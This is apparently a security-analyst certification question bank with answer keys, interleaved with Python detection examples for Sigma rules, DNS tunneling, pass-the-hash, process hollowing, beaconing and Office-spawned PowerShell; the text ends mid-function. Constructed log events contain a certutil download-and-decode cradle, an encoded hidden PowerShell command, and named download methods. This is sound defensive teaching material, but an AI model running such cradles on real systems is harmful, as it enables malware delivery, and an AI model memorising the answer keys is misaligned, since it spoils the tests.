A security analyst uses Wireshark to capture traffic and notices an unusually high number of DNS queries for random-looking subdomains under a single domain, such as 'a1b2c3.malicious.com'. The TTL values are very low. The analyst suspects DNS tunneling. Which of the following additional indicators would most strongly support this hypothesis?

A.Large number of NXDOMAIN responses
B.DNS queries with unusually large TXT record response sizes
C.High number of A record queries
D.Queries originating from a DNS server
AnswerB

Correct. Large TXT records are a common sign of data exfiltration via DNS tunneling.

Why this answer

DNS tunneling encodes outbound data in the query name and inbound data in the response; TXT records carry arbitrary text, so unusually large TXT responses are the clearest sign of a downstream channel. Bursts of NXDOMAIN point to a DGA instead, A records are the most common legitimate query type, and queries originating from a DNS server are simply the internal resolver forwarding on behalf of clients.

137
MCQeasy

A vulnerability scan report shows a critical finding with a CVSS score of 9.8. The system is a web server behind a WAF that blocks the attack vector. What should the analyst do?

A.Report the finding as a false positive
B.Re-run the scan with credentials
C.Patch the server immediately
D.Document the WAF as a compensating control and accept the risk
AnswerD

Correct. Compensating controls reduce risk.

Why this answer

A compensating control (WAF) may mitigate the risk. The analyst should document it, adjust the risk rating accordingly and keep the finding on the register, because a WAF blocks the known attack vector rather than removing the vulnerability; if the WAF rule is changed or bypassed, the exposure returns. Marking the finding a false positive (A) would hide a real weakness.

138
Multi-Selecthard

A security analyst is reviewing an alert from Azure Sentinel that indicates a possible privilege escalation attempt. The alert is based on a correlation rule that detects unusual usage of the 'Add-AzKeyVaultKey' cmdlet by a user who has never used it before. The analyst needs to validate the alert and determine if the activity is malicious. Which THREE actions should the analyst take?

Select 3 answers
A.Check the user's role assignments and permissions
B.Run a vulnerability scan on the user's workstation
C.Review the Key Vault's diagnostic logs for any key retrieval after the cmdlet
D.Disable the user account immediately
E.Verify the user's identity by checking Azure AD sign-in logs
AnswersA, C, E

Understanding the user's privileges helps assess if the action is within scope.

Why this answer

Checking the user's role assignments shows whether the cmdlet was within their permissions, Azure AD sign-in logs establish whether the session was really the user (location, device, MFA result), and the Key Vault diagnostic logs show whether the new key was subsequently retrieved or used. Disabling the account before validation (D) and scanning the workstation (B) do not help establish whether the activity was malicious.

139
MCQmedium

A threat hunter is creating a hypothesis based on the MITRE ATT&CK framework. The hunter wants to detect adversaries using PowerShell to download files from remote servers. Which ATT&CK technique should the hunter focus on?

A.T1078 (Valid Accounts)
B.T1053.005 (Scheduled Task)
C.T1047 (WMI)
D.T1059.001 (PowerShell)
AnswerD

PowerShell is the execution technique that download cradles run under, so the hypothesis is written against it.

Why this answer

T1059.001 is PowerShell. Strictly, the file transfer itself maps to T1105 (Ingress Tool Transfer), but all four options describe how code is executed, and PowerShell is the vector used for download cradles such as Invoke-WebRequest, (New-Object Net.WebClient).DownloadString() and Start-BitsTransfer. The hunter should write detections for those patterns in process command lines and in PowerShell Script Block Logging (Event ID 4104), where encoded or obfuscated cradles appear decoded.

140
MCQhard

A security analyst is reviewing DNS logs and notices that a workstation is making frequent queries to domains with random-looking strings, such as 'a3b9f2d1.example.com'. These domains resolve to different IP addresses each time. Which type of activity is most likely being observed?

A.Normal DNS caching behavior
B.A misconfigured DNS resolver
C.DNS tunneling
D.Domain generation algorithm (DGA) usage
AnswerD

Random-looking domains that change frequently are characteristic of DGA.

Why this answer

Domain Generation Algorithms (DGAs) produce random-looking domain names that change frequently to evade blocklists, and the infrastructure behind them often rotates IP addresses (fast flux), which is why each name resolves differently. This behaviour is typical of malware using a DGA to locate its command-and-control server. DNS tunneling looks different: many encoded subdomains under one stable registered domain, rather than many different domains.

141
MCQhard

A threat hunter is creating a Sigma rule to detect a specific TTP where an attacker uses reg.exe to create a Run key for persistence. Which of the following Sigma rule event selectors would best detect this activity?

A.EventID: 4688 (Process Creation) AND ParentImage: '*reg.exe*'
B.EventID: 13 (Registry Value Set) AND TargetObject: '*\CurrentVersion\Run*'
C.EventID: 4657 (Registry modification) AND ObjectName: '*\RunOnce*'
D.EventID: 1 (Process Creation) AND CommandLine: '*reg.exe*'
AnswerB

Sysmon Event ID 13 records the value write itself, with the target path and the process that performed it.

Why this answer

Run-key persistence writes a value under HKCU\Software\Microsoft\Windows\CurrentVersion\Run (or the HKLM equivalent, and the RunOnce siblings). Sysmon Event ID 13 (RegistryEvent, value set) records the path, the value data and the process that wrote it, so a selector on EventID 13 with TargetObject containing \CurrentVersion\Run catches the write whether reg.exe, PowerShell or a dropper performed it. Sysmon records HKCU paths as HKU\<SID>\..., so the pattern should not anchor on an HKCU prefix. Option D would only prove that reg.exe ran, option A has the parent and child the wrong way round, and option C (Security Event 4657) requires object-access auditing with a SACL on the key and is limited to RunOnce.
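Worked example (added here; not code from the question bank): a minimal Sigma-style matcher in Python that evaluates the certutil rule from question 124 and the Run-key rule from this question against constructed Sysmon events. It implements only the Sigma subset the rules need (equality, contains, endswith, startswith, the |all modifier, list values as OR, and AND across named selections); the events, paths and SID are constructed for the example.

```python
"""Evaluate Sigma-style selections for certutil download cradles and Run-key
persistence against constructed Sysmon events.

Added example, not code from the question bank. The matcher supports only the
Sigma subset used here (equality, contains, endswith, startswith, |all, list
values as OR, implicit AND across named selections). Events, paths and the SID
are constructed.
"""

RULES = [
    {
        "title": "Certutil download cradle",
        "detection": {
            "selection": {
                "EventID": 1,
                "Image|endswith": r"\certutil.exe",
                # either switch fetches a URL; -split / -f are written to the hits for context
                "CommandLine|contains": ["urlcache", "verifyctl"],
            },
            "selection_url": {"CommandLine|contains": ["http://", "https://", "ftp://"]},
        },
    },
    {
        "title": "Certutil decode of dropped file",
        "detection": {
            "selection": {
                "EventID": 1,
                "Image|endswith": r"\certutil.exe",
                "CommandLine|contains": "decode",     # matches -decode, /decode, -decodehex
            },
        },
    },
    {
        "title": "Run key persistence",
        "detection": {
            # Image is deliberately not restricted to reg.exe: the write is the signal.
            "selection": {"EventID": 13, "TargetObject|contains": r"\CurrentVersion\Run"},
        },
    },
]

SID = "S-1-5-21-1111111111-2222222222-3333333333-1001"   # constructed user SID
RUN_KEY = "HKU\\" + SID + r"\Software\Microsoft\Windows\CurrentVersion\Run\Updater"
OTHER_KEY = "HKU\\" + SID + r"\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden"

# Constructed Sysmon records reduced to the fields the rules use.
EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://203.0.113.10/a.txt C:\Users\Public\a.txt"},
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -decode C:\Users\Public\a.txt C:\Users\Public\a.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -verify -urlfetch C:\certs\server.cer"},      # legitimate use
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": RUN_KEY, "Details": r"C:\Users\Public\a.exe"},
    {"EventID": 13, "Image": r"C:\Windows\explorer.exe",
     "TargetObject": OTHER_KEY, "Details": "DWORD (0x00000001)"},                # benign write
]


def field_matches(event, key, expected):
    """Apply one Sigma field selector ('Field|modifier|...') to an event."""
    field, *mods = key.split("|")
    value = str(event.get(field, "")).lower()
    candidates = expected if isinstance(expected, list) else [expected]

    def one(exp):
        exp = str(exp).lower()
        if "contains" in mods:
            return exp in value
        if "endswith" in mods:
            return value.endswith(exp)
        if "startswith" in mods:
            return value.startswith(exp)
        return value == exp

    results = [one(c) for c in candidates]
    return all(results) if "all" in mods else any(results)   # a list is OR unless |all


def rule_matches(rule, event):
    """Every named selection must match (Sigma: 'condition: selection and selection_url')."""
    return all(all(field_matches(event, k, v) for k, v in sel.items())
               for sel in rule["detection"].values())


def evaluate(rules, events):
    """Return (rule title, event) pairs for every rule that fires on an event."""
    return [(rule["title"], ev) for ev in events for rule in rules if rule_matches(rule, ev)]


if __name__ == "__main__":
    for title, ev in evaluate(RULES, EVENTS):
        print(f"{title}: {ev['Image']} -> {ev.get('CommandLine') or ev.get('TargetObject')}")
```

The legitimate certutil -verify -urlfetch line and the Explorer registry write fall through every rule, which is the point of requiring both a download switch and a URL rather than the certutil image alone.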

142
MCQmedium

An analyst receives an alert that a user's workstation contacted a known command-and-control (C2) IP address. The analyst checks the EDR logs and finds that the process 'svchost.exe' initiated the connection. What should the analyst do next to determine if this is a true positive?

A.Check the parent process of svchost.exe
B.Verify the IP address with threat intelligence feeds
C.Search for other workstations contacting the same IP
D.Isolate the workstation from the network immediately
AnswerA

A genuine svchost.exe is started by services.exe from %SystemRoot%\System32 with a -k service-group argument; a different parent or path indicates masquerading or injection.

Why this answer

Checking the parent process (and image path) of svchost.exe separates a legitimate service host, which services.exe starts from System32 with a -k service-group argument, from an impostor started by cmd.exe, an Office application or a file in a user-writable directory. If the parent and path are legitimate, the connection may come from code injected into the real svchost.exe, which makes memory analysis the next step. Threat intelligence (B) already fired the alert, and isolation (D) and scoping to other hosts (C) follow once the alert is confirmed.

143
MCQeasy

A security analyst is reviewing a SIEM alert that triggered on a single failed login attempt from a known internal IP address to a file server. The user authenticated successfully on the next attempt. Which classification best describes this alert?

A.True negative
B.True positive
C.False negative
D.False positive
AnswerD

Correct. The alert fired on benign activity, so it is a false positive.

Why this answer

The alert is a false positive because a single failed login followed by success is normal user behavior and not indicative of malicious activity.

144
MCQeasy

A security analyst is reviewing a SIEM alert that triggered on a known malicious IP address communicating with an internal server. The analyst checks the threat intelligence feed and confirms the IP is associated with a command-and-control server. What type of alert is this?

A.False negative
B.True positive
C.False positive
D.True negative
AnswerB

The alert correctly identified known malicious activity.

Why this answer

A true positive occurs when an alert correctly identifies malicious activity. The IP is confirmed as a C2 server, so the alert is valid.

145
MCQmedium

A SOC analyst is triaging a SIEM alert for a registry modification on a workstation. The alert indicates a new Run key was added under HKCU\Software\Microsoft\Windows\CurrentVersion\Run. Which of the following is the most likely purpose of this modification?

A.To change the desktop wallpaper
B.To establish persistence
C.To disable Windows Defender
D.To update the system time
AnswerB

Run keys cause the specified program to run at every user logon, providing persistence.

Why this answer

Run keys are a common persistence mechanism used by malware to ensure execution at user logon.

146
MCQeasy

Which of the following is the best data source for detecting DNS tunneling activity?

A.Firewall logs
B.DNS logs
C.EDR telemetry
D.NetFlow data
AnswerB

DNS logs provide the full query and response details needed to detect tunneling.

Why this answer

DNS logs contain the queries and responses; analyzing them for unusual domain patterns, large query volumes, or odd record types can reveal tunneling.
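Worked example (added here; not code from the question bank): Python that scores a constructed DNS query log for the two patterns discussed in questions 120, 136 and 140, DGA (many distinct random-looking registered domains, mostly NXDOMAIN) versus tunneling (many long encoded subdomains under one domain, TXT-heavy, large answers). The log, the naive two-label registered-domain split and every threshold are assumptions made for the example; a real implementation would split names with the Public Suffix List.

```python
"""Separate DGA-style lookups from DNS-tunneling-style lookups in a constructed
DNS query log.

Added example, not code from the question bank. DNS_LOG is constructed; the
two-label registered-domain split, thresholds and response sizes are
illustrative assumptions (use the Public Suffix List in production).
"""
import math
from collections import Counter, defaultdict
from statistics import mean


def shannon_entropy(s):
    """Bits per character: 'aabb' -> 1.0, a 12-letter label with no repeats -> 3.58."""
    if not s:
        return 0.0
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def split_name(qname):
    """Naive split: last two labels are the registered domain, the rest the subdomain."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def build_log():
    log = []
    # Host 10.0.0.5: DGA pattern, a new random second-level domain per query,
    # unregistered (NXDOMAIN) until one resolves to the live C2.
    for dom, rcode in [("kqzwvhtrpmnf.com", "NXDOMAIN"), ("bxmlqrtzvkpo.net", "NXDOMAIN"),
                       ("wqerptyumnlk.info", "NXDOMAIN"), ("zvhtrkqwmnpx.com", "NOERROR")]:
        log.append({"client": "10.0.0.5", "qname": dom, "qtype": "A", "rcode": rcode, "resp_bytes": 60})
    # Host 10.0.0.7: tunneling pattern, long encoded labels under one domain,
    # TXT answers carrying a few hundred bytes each (labels generated deterministically).
    for i in range(12):
        label = "".join(chr(ord("a") + (i * 7 + j) % 26) for j in range(24))
        log.append({"client": "10.0.0.7", "qname": f"{label}.tun.example.net",
                    "qtype": "TXT", "rcode": "NOERROR", "resp_bytes": 420})
    # Host 10.0.0.9: ordinary browsing.
    for name in ["www.example.com", "mail.example.com", "cdn.example.org", "www.example.com"]:
        log.append({"client": "10.0.0.9", "qname": name, "qtype": "A", "rcode": "NOERROR", "resp_bytes": 90})
    return log


DNS_LOG = build_log()


def dga_candidates(log, min_domains=3, min_nx_ratio=0.5, min_len=10, min_entropy=3.0):
    """Clients that query many distinct random-looking registered domains with a high NXDOMAIN ratio."""
    per_client = defaultdict(lambda: {"domains": set(), "nx": 0, "total": 0})
    for r in log:
        registered, _sub = split_name(r["qname"])
        label = registered.split(".")[0]
        st = per_client[r["client"]]
        st["total"] += 1
        st["nx"] += r["rcode"] == "NXDOMAIN"
        if len(label) >= min_len and shannon_entropy(label) >= min_entropy:
            st["domains"].add(registered)
    out = {}
    for client, st in per_client.items():
        nx_ratio = st["nx"] / st["total"]
        if len(st["domains"]) >= min_domains and nx_ratio >= min_nx_ratio:
            out[client] = {"random_domains": len(st["domains"]), "nxdomain_ratio": round(nx_ratio, 2)}
    return out


def tunneling_candidates(log, min_unique=5, min_label_len=16, min_entropy=3.0,
                         max_resp_bytes=256, txt_share=0.5):
    """Registered domains whose subdomains look like an encoded data channel."""
    per_domain = defaultdict(lambda: {"subs": set(), "qtypes": Counter(), "resp": [], "clients": set()})
    for r in log:
        registered, sub = split_name(r["qname"])
        if not sub:
            continue
        st = per_domain[registered]
        st["subs"].add(sub)
        st["qtypes"][r["qtype"]] += 1
        st["resp"].append(r["resp_bytes"])
        st["clients"].add(r["client"])
    out = {}
    for dom, st in per_domain.items():
        if len(st["subs"]) < min_unique:
            continue
        reasons = []
        lengths = [len(s) for s in st["subs"]]
        entropies = [shannon_entropy(s.replace(".", "")) for s in st["subs"]]
        if mean(lengths) >= min_label_len and mean(entropies) >= min_entropy:
            reasons.append("long high-entropy subdomains")
        if mean(st["resp"]) > max_resp_bytes:
            reasons.append("large responses")
        if st["qtypes"]["TXT"] / sum(st["qtypes"].values()) >= txt_share:
            reasons.append("TXT-heavy")
        if reasons:
            out[dom] = {"reasons": reasons, "unique_subdomains": len(st["subs"]),
                        "clients": sorted(st["clients"])}
    return out


if __name__ == "__main__":
    print("DGA:", dga_candidates(DNS_LOG))
    print("Tunneling:", tunneling_candidates(DNS_LOG))
```

The two scorers key on different things on purpose: the DGA client is flagged by how many different random registered domains it tries and how often they fail to resolve, while the tunneling domain is flagged by the shape of the subdomains and answers under one name, which is why neither pattern trips the other detector on this log.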

147
MCQmedium

A security analyst is tuning a SIEM correlation rule that generates alerts when a single user logs into more than 10 workstations within 5 minutes. The rule is producing excessive false positives due to service accounts performing automated tasks. Which of the following is the best tuning approach to reduce false positives while still detecting potential lateral movement?

A.Change the time window to 10 minutes
B.Increase the threshold to 20 workstations
C.Add an exception for known service account names
D.Disable the rule and rely on manual log review
AnswerC

Correct. Excluding known service accounts reduces false positives without weakening detection for user accounts.

Why this answer

Excluding known service accounts from the rule reduces false positives while still detecting lateral movement by user accounts.
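Worked example (added here; not code from the question bank): the pass-the-hash correlation rule from question 118, written in Python over constructed Windows Security events, with the service-account exclusion from this question. It counts distinct NTLM logon-type-3 destinations per (source IP, user) in a sliding window, alerts once per pair when the threshold is reached, and reports how many 4776 validations the domain controller logged for that user in the window. Event fields, host names, addresses, epoch timestamps and thresholds are assumptions made for the example.

```python
"""Correlate NTLM network logons per source into a lateral-movement alert,
with a service-account exclusion.

Added example, not code from the question bank. EVENTS are constructed Windows
Security events reduced to the fields the rule needs; timestamps are epoch
seconds, and the host names, addresses and thresholds are assumptions.
"""
from collections import defaultdict, deque

BASE = 1_700_000_000


def logon(ts, computer, user, ip, package):
    """Constructed 4624 as written on the destination host that accepted the logon."""
    return {"EventID": 4624, "TimeCreated": ts, "Computer": computer, "TargetUserName": user,
            "LogonType": 3, "AuthenticationPackageName": package, "IpAddress": ip}


def ntlm_validation(ts, user, workstation):
    """Constructed 4776 as written on the domain controller."""
    return {"EventID": 4776, "TimeCreated": ts, "Computer": "DC01",
            "TargetUserName": user, "Workstation": workstation}


def build_events():
    events = []
    # alice's hash replayed from 10.0.0.12 against six workstations, 30 s apart;
    # the DC validates each attempt a second before the destination logs 4624.
    for i in range(6):
        t = BASE + 30 * i
        events.append(ntlm_validation(t - 1, "alice", "WS-12"))
        events.append(logon(t, f"WS-{i + 1:02d}", "alice", "10.0.0.12", "NTLM"))
    # svc_backup legitimately touches twelve servers in quick succession every night.
    for i in range(12):
        events.append(logon(BASE + 10 * i, f"SRV-{i + 1:02d}", "svc_backup", "10.0.0.50", "NTLM"))
    # bob reaches six hosts with Kerberos: out of scope for an NTLM rule.
    for i in range(6):
        events.append(logon(BASE + 20 * i, f"WS-{i + 20}", "bob", "10.0.0.33", "Kerberos"))
    return events


EVENTS = build_events()


def pth_alerts(events, window_s=300, min_targets=5, service_accounts=frozenset({"svc_backup"})):
    """One alert per (source IP, user) the first time distinct NTLM type-3
    destinations within window_s reach min_targets; excluded accounts are skipped."""
    logons = sorted((e for e in events
                     if e["EventID"] == 4624 and e["LogonType"] == 3
                     and e["AuthenticationPackageName"] == "NTLM"
                     and e["TargetUserName"].lower() not in service_accounts),
                    key=lambda e: e["TimeCreated"])
    validations = [e for e in events if e["EventID"] == 4776]
    recent = defaultdict(deque)        # (ip, user) -> deque of (ts, destination)
    alerted, alerts = set(), []
    for e in logons:
        key = (e["IpAddress"], e["TargetUserName"])
        q = recent[key]
        q.append((e["TimeCreated"], e["Computer"]))
        while e["TimeCreated"] - q[0][0] > window_s:
            q.popleft()                # drop logons that fell out of the window
        targets = sorted({dest for _, dest in q})
        if len(targets) >= min_targets and key not in alerted:
            alerted.add(key)
            lo, hi = e["TimeCreated"] - window_s, e["TimeCreated"]
            # 4776 carries the workstation name, not the IP, so it is counted per user only.
            dc_count = sum(1 for v in validations
                           if v["TargetUserName"] == e["TargetUserName"] and lo <= v["TimeCreated"] <= hi)
            alerts.append({"source": key[0], "user": key[1], "targets": targets,
                           "window_end": hi, "dc_validations": dc_count})
    return alerts


if __name__ == "__main__":
    for a in pth_alerts(EVENTS):
        print(a)
    print("without exclusion:", [a["user"] for a in pth_alerts(EVENTS, service_accounts=frozenset())])
```

Running the rule with an empty exclusion set reproduces the noise described in the question (svc_backup fires too), and bob's Kerberos logons never enter the rule because the NTLM filter is applied before windowing; pass-the-ticket would need a separate rule keyed on Kerberos events.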

148
MCQhard

An analyst is reviewing a memory dump of a compromised system and notices that the memory of a legitimate process (e.g., notepad.exe) contains a PE header and executable code that is not part of the original binary. Which technique is most likely being used?

A.A reflective DLL loader
B.Process hollowing
C.DLL injection
D.API hooking
AnswerB

Process hollowing replaces the process's code with attacker code, so the process's memory holds a PE image that does not match its original binary.

Why this answer

Among the options, process hollowing is the technique that maps an entire replacement PE image into a legitimate process, so a second PE header and foreign executable code inside notepad.exe are consistent with it. A reflective loader also leaves a PE image in memory, so the analyst should confirm hollowing by comparing the process's image base and entry point with the notepad.exe on disk; a mismatch shows the original code was replaced.
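Worked example (added here; not code from the question bank): a malfind-style triage in Python over constructed memory-region records, covering the findings in questions 125, 129 and this one. It flags private (file-less) executable regions, tells a complete PE image apart from raw shellcode by following e_lfanew to the PE signature, and flags an image-backed region whose in-memory header no longer matches the on-disk file, which is what hollowing leaves behind. The region table, the fake PE headers and the header-prefix comparison are simplifying assumptions; real tooling compares the PEB image base and whole sections.

```python
"""Malfind-style triage of a process's memory regions from constructed data.

Added example, not code from the question bank. REGIONS mimics what a VAD walk
returns (start, size, protection, backing file, first bytes); the fake PE
headers, addresses and the 'disk_head' comparison are simplifying assumptions.
"""
import struct

EXECUTABLE = {"PAGE_EXECUTE", "PAGE_EXECUTE_READ", "PAGE_EXECUTE_READWRITE", "PAGE_EXECUTE_WRITECOPY"}


def fake_pe_head():
    """Minimal DOS header whose e_lfanew points at a 'PE\\0\\0' signature at 0x40."""
    head = bytearray(0x48)
    head[0:2] = b"MZ"
    struct.pack_into("<I", head, 0x3C, 0x40)        # e_lfanew
    head[0x40:0x44] = b"PE\x00\x00"
    return bytes(head)


def looks_like_pe(head):
    """True if head starts with 'MZ' and e_lfanew lands on a PE signature."""
    if len(head) < 0x40 or head[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", head, 0x3C)[0]
    return head[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def build_regions():
    disk = fake_pe_head()
    tampered = bytearray(disk)
    tampered[0x10:0x14] = b"\xde\xad\xbe\xef"   # in-memory header no longer matches the file
    return [
        # main image of the process: file-backed, but contents differ from disk (hollowed)
        {"start": 0x7FF6A0000000, "size": 0x40000, "protection": "PAGE_EXECUTE_WRITECOPY",
         "mapped_file": r"\Windows\System32\svchost.exe", "head": bytes(tampered), "disk_head": disk},
        # ordinary system DLL: file-backed and identical to disk
        {"start": 0x7FFD10000000, "size": 0x1F0000, "protection": "PAGE_EXECUTE_READ",
         "mapped_file": r"\Windows\System32\ntdll.dll", "head": disk, "disk_head": disk},
        # heap: private but not executable, so never of interest here
        {"start": 0x00020000, "size": 0x10000, "protection": "PAGE_READWRITE",
         "mapped_file": None, "head": b"\x00" * 0x48, "disk_head": None},
        # private RWX region holding a whole PE image (reflectively loaded DLL)
        {"start": 0x001A0000, "size": 0x30000, "protection": "PAGE_EXECUTE_READWRITE",
         "mapped_file": None, "head": disk, "disk_head": None},
        # private RWX region holding raw code with no header (shellcode stub)
        {"start": 0x002B0000, "size": 0x1000, "protection": "PAGE_EXECUTE_READWRITE",
         "mapped_file": None, "head": b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00", "disk_head": None},
    ]


REGIONS = build_regions()


def scan_regions(regions):
    """Return the executable regions that should not look the way they do."""
    findings = []
    for r in regions:
        if r["protection"] not in EXECUTABLE:
            continue
        if r["mapped_file"] is None:
            if looks_like_pe(r["head"]):
                kind, note = "unbacked PE", "private executable memory holding a PE image (reflective DLL / injected module)"
            else:
                kind, note = "unbacked code", "private executable memory with no PE header (shellcode)"
        elif r["disk_head"] is not None and r["head"][:len(r["disk_head"])] != r["disk_head"]:
            kind, note = "hollowed image", f"image-backed region whose header differs from {r['mapped_file']}"
        else:
            continue
        findings.append({"start": hex(r["start"]), "kind": kind, "note": note})
    return findings


if __name__ == "__main__":
    for f in scan_regions(REGIONS):
        print(f["start"], f["kind"], "-", f["note"])
```

The ntdll.dll region passes because it is both file-backed and identical to the file; that comparison, not the mere presence of a PE header in memory, is what separates hollowing from a reflective load.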

149
MCQmedium

During a network traffic analysis, a security analyst notices a host communicating with an external IP address over TCP port 443 using a self-signed certificate. The traffic flows are consistent in size and occur every 60 seconds. The external IP is not on any threat intelligence feeds. What does this pattern most likely indicate?

A.Lateral movement attempt
B.Data exfiltration via DNS tunneling
C.Command and control beaconing
D.Normal web browsing
AnswerC

Correct. Periodic, consistent outbound connections are characteristic of C2 beaconing.

Why this answer

Regular, periodic connections of consistent size to an external host over HTTPS are the signature of beaconing: the implant checks in on a timer, and an empty check-in and its reply are always about the same length. The self-signed certificate supports the hypothesis, since legitimate services rarely present one, and absence from threat intelligence feeds does not clear an address, because C2 infrastructure is often new. Real implants add jitter to the interval, so detection should tolerate some variance rather than require exactly 60 seconds.
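Worked example (added here; not code from the question bank): Python that finds the beaconing pattern in constructed NetFlow-style records. It groups flows by source, destination and port and flags groups whose inter-arrival times and byte counts both have a low coefficient of variation, so a little jitter is tolerated while ordinary browsing is not flagged. Addresses, the jitter values and the thresholds are assumptions made for the example.

```python
"""Flag periodic, fixed-size outbound flows (C2 beaconing) in constructed
connection records.

Added example, not code from the question bank. FLOWS is constructed
NetFlow-style data; the jitter values, thresholds and addresses are assumptions.
"""
from collections import defaultdict
from statistics import mean, pstdev


def build_flows():
    flows = []
    base = 1_700_000_000
    # Beacon: one TLS connection a minute with a little jitter, always about 512 bytes out.
    jitter = [0, 1, -1, 2, 0, -2, 1, 0, 1, -1, 2, 0]
    size_wobble = [0, 4, -4, 8, 0, -8, 4, 0, 4, -4, 8, 0]
    for i, (j, w) in enumerate(zip(jitter, size_wobble)):
        flows.append({"ts": base + 60 * i + j, "src": "10.0.0.12", "dst": "198.51.100.7",
                      "dport": 443, "bytes_out": 512 + w})
    # Browsing from another host: bursts and pauses, sizes all over the place.
    gaps = [0, 5, 120, 3, 2, 400, 9, 60, 1, 250]
    sizes = [1200, 43000, 800, 15000, 2200, 900, 87000, 300, 5400, 12000]
    t = base
    for g, s in zip(gaps, sizes):
        t += g
        flows.append({"ts": t, "src": "10.0.0.15", "dst": "203.0.113.80", "dport": 443, "bytes_out": s})
    return flows


FLOWS = build_flows()


def coefficient_of_variation(values):
    """Population standard deviation divided by the mean (scale-free regularity measure)."""
    m = mean(values)
    return pstdev(values) / m if m else float("inf")


def beacon_candidates(flows, min_flows=8, max_interval_cv=0.15, max_size_cv=0.25):
    """Group flows by (src, dst, dport); flag groups whose inter-arrival times and
    sizes are both nearly constant. Returns {key: stats}."""
    groups = defaultdict(list)
    for f in flows:
        groups[(f["src"], f["dst"], f["dport"])].append(f)
    out = {}
    for key, fl in groups.items():
        if len(fl) < min_flows:
            continue                      # too few flows to judge periodicity
        fl.sort(key=lambda f: f["ts"])
        intervals = [b["ts"] - a["ts"] for a, b in zip(fl, fl[1:])]
        sizes = [f["bytes_out"] for f in fl]
        icv, scv = coefficient_of_variation(intervals), coefficient_of_variation(sizes)
        if icv <= max_interval_cv and scv <= max_size_cv:
            out[key] = {"count": len(fl), "period_s": round(mean(intervals), 1),
                        "interval_cv": round(icv, 3), "size_cv": round(scv, 3)}
    return out


if __name__ == "__main__":
    for key, stats in beacon_candidates(FLOWS).items():
        print(key, stats)
```

The browsing host has more than enough flows to clear the count threshold, so the count alone would produce false positives; it is the near-zero variance of interval and size together that singles out the beacon.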

150
MCQmedium

A security analyst is triaging an alert from the EDR that shows the process 'powershell.exe' with a parent process of 'winword.exe'. The user recently opened a document from an email. What is the most likely explanation?

A.The user double-clicked a PowerShell script attached to the email
B.The document contains a malicious macro that spawned PowerShell to execute commands
C.A scheduled task started PowerShell that initiated Word
D.The user is running a legitimate PowerShell script from within a Word document
AnswerB

Attackers often use macros in Office documents to launch PowerShell for code execution.

Why this answer

This is a classic sign of a macro-based attack where a malicious document spawns PowerShell to execute payloads.
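Worked example (added here; not code from the question bank): Python process-tree checks over constructed Sysmon Event ID 1 records that cover the anomalies in questions 119, 123, 142 and this one: a core Windows binary with an unexpected parent or path, svchost.exe without its -k service group, an Office application spawning a shell, and an encoded PowerShell command line. The events are constructed, and the expected-parent and expected-path tables are an illustrative baseline, not a complete one for every Windows build.

```python
"""Parent-child and command-line checks over constructed Sysmon Event ID 1
(process creation) records.

Added example, not code from the question bank. EVENTS are constructed; the
expected-parent and expected-path tables are an illustrative baseline rather
than a complete one for every Windows build.
"""
import ntpath

# Illustrative baseline: which parent a core Windows binary should have.
EXPECTED_PARENT = {"svchost.exe": {"services.exe"}, "services.exe": {"wininit.exe"},
                   "lsass.exe": {"wininit.exe"}, "csrss.exe": {"smss.exe"}}
EXPECTED_PATH = {"svchost.exe": {r"c:\windows\system32\svchost.exe",
                                 r"c:\windows\syswow64\svchost.exe"}}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
          "mshta.exe", "rundll32.exe"}
ENCODED_FLAGS = {"-enc", "-encodedcommand", "-e", "-ec"}


def event(pid, image, ppid, parent_image, cmdline):
    """Constructed Sysmon Event ID 1 record reduced to the fields used here."""
    return {"ProcessId": pid, "Image": image, "ParentProcessId": ppid,
            "ParentImage": parent_image, "CommandLine": cmdline}


OFFICE = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
EVENTS = [
    event(700, r"C:\Windows\System32\services.exe", 600, r"C:\Windows\System32\wininit.exe",
          "services.exe"),
    event(900, r"C:\Windows\System32\svchost.exe", 700, r"C:\Windows\System32\services.exe",
          "svchost.exe -k netsvcs -p"),
    event(3100, OFFICE, 2000, r"C:\Windows\explorer.exe", '"WINWORD.EXE" /n invoice.docm'),
    # Question 150: Word spawning an encoded PowerShell command after a mail attachment opened.
    event(3120, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", 3100, OFFICE,
          "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    # Questions 119/142: an 'svchost.exe' that cmd.exe started from a user-writable path.
    event(4200, r"C:\Users\alice\AppData\Local\Temp\svchost.exe", 4100,
          r"C:\Windows\System32\cmd.exe", "svchost.exe"),
]


def basename(path):
    return ntpath.basename(path).lower()


def check_process(ev):
    """Return the list of anomalies one process-creation event exhibits."""
    name, parent = basename(ev["Image"]), basename(ev["ParentImage"])
    tokens = [t.lower() for t in ev["CommandLine"].split()]
    findings = []
    if name in EXPECTED_PARENT and parent not in EXPECTED_PARENT[name]:
        findings.append(f"{name} spawned by {parent}, expected {sorted(EXPECTED_PARENT[name])}")
    if name in EXPECTED_PATH and ev["Image"].lower() not in EXPECTED_PATH[name]:
        findings.append(f"{name} running from unexpected path {ev['Image']}")
    if name == "svchost.exe" and "-k" not in tokens:
        findings.append("svchost.exe started without a -k service group")
    if parent in OFFICE_APPS and name in SHELLS:
        findings.append(f"Office application {parent} spawned {name}")
    if name in {"powershell.exe", "pwsh.exe"} and ENCODED_FLAGS & set(tokens):
        findings.append("PowerShell launched with an encoded command")
    return findings


def analyze(events):
    """Map ProcessId -> findings for every event with at least one anomaly."""
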